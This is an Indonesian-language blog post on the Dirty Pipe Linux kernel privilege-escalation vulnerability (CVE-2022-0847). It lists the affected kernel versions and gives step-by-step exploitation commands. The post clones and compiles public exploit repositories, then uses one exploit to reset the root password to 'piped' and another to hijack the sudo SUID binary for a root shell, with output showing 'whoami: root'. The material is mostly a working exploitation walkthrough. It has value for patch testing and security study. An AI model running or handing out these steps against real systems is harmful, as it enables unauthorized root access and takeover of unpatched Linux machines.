[CVE-2022-0847] DirtyPipe
Dirty Pipe (CVE-2022-0847) adalah kerentanan local privilege escalation pada kernel Linux yang memungkinkan user biasa untuk:
- Modifikasi/overwrite file seperti
/etc/passwd
. - Mendapatkan shell root.
Versi kernel yang rentan
- Kernel linux di atas versi 5.8 rentan.
- Sejauh ini kerentanan ini telah di-patch pada versi ini:
- 5.16.11
- 5.15.25
- 5.10.102
Tahap eksploitasi
Step 1: Cek versi kernel
1
2
3
4
5
6
7
8
9
# clone script
➜ git clone https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
➜ cd CVE-2022-0847-dirty-pipe-checker
➜ chmod +x dpipe.sh
# cek dirty pipe pada versi yang digunakan saat ini
➜ ./dpipe.sh
# cek dirty pipe pada spesifik versi
➜ ./dpipe.sh 5.10.11
Step 2: Eksploitasi dirtypipe
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# clone scirpt
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
cd CVE-2022-0847-DirtyPipe-Exploits
chmod +x compile.sh
# compile exploit
./compile.sh
# exploit 1 - mengubah password root menjadi "piped"
./exploit-1
# exploit 2 - hijack binary (contoh sudo untuk root)
➜ ./exploit-2 /usr/bin/sudo
[+] hijacking suid binary..
[+] dropping suid shell..
[+] restoring suid binary..
[+] popping root shell.. (dont forget to clean up /tmp/sh ;))
# whoami
root
Referensi
- https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit
- https://dirtypipe.cm4all.com/
- https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker
This post is licensed under CC BY 4.0 by the author.